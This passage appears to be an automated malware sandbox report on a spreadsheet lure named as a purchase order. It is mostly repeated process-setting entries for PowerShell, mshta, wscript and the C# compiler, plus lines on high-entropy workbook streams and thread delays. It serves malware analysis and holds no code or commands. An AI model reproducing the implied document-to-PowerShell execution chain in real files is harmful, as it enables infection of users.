        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: Orden_de_Compra_Nmero_6782929219.xlsStream path 'MBD00068A0F/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
        Source: Orden_de_Compra_Nmero_6782929219.xlsStream path 'Workbook' entropy: 7.99865450094 (max. 8.0)
        Source: 54330000.0.drStream path 'MBD00068A0F/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
        Source: 54330000.0.drStream path 'Workbook' entropy: 7.9988158637 (max. 8.0)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
